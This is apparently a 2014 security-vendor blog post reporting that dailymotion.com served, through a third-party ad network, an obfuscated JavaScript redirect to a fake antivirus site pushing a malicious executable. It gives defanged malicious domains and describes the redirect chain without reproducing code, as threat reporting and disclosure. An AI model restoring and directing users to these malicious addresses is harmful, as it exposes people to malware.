Sophos enters into an agreement to acquire Invincea redirects to Fake AV Threat

Jan 7, 2014


Today we noticed that browsing to hxxp://www[.]dailymotion[.]com yields a Fake A/V threat as seen in the brief video below. Details of the malware have been provided below. The payload has a current detection ratio of 10/47.

As of the time of this blog (1:30 EST 1/7/14) the payload was still being served to our knowledge. We have been in contact with the web property and disclosed this information. We will provide updates/further analysis as we have it available.

The threat compels the target to download a malicious .exe as a ruse to “clean” their “infected” machine…traditional Fake A/V attack. Noteworthy is the fact that the web property is ranked around 90th in the world with more than 17m monthly viewers and that this payload is served through 3rd party ad network similar to what was witnessed a few days ago with Yahoo!

Dailymotion fake av

The redirect is to hxxp://853e4f39[.]webantivirusprorh[.]pl/ ( as seen in the Invincea forensic data captured from running the malware in the virtual container: fake av

A javascript based redirect is loaded via and seen here.  You can see the obfuscated script tag on the first line which gets written to the page via a document.write():

Fake AV

This following script loaded from does another document.write() to the .pl site hosting the FakeAV binary as seen here:

Fake av dailymotion

Contents of the index page hosted on 853e4f39[.]webantivirusprorh[.]pl

Fake dailymotion anitvirus

Upon successful installation, the system is rebooted and the victim is presented with the following image showing an active “scan” of their system:

Fake dailymotion anitvirus-1

You may also be interested in...

Healthcare: Stopping Ransomware at the Point of Attack

read more

Attackers are Cashing In on Ransomware

read more

Pushing Through the Noise, Right to the Top – NSS Labs AEP Test Results

read more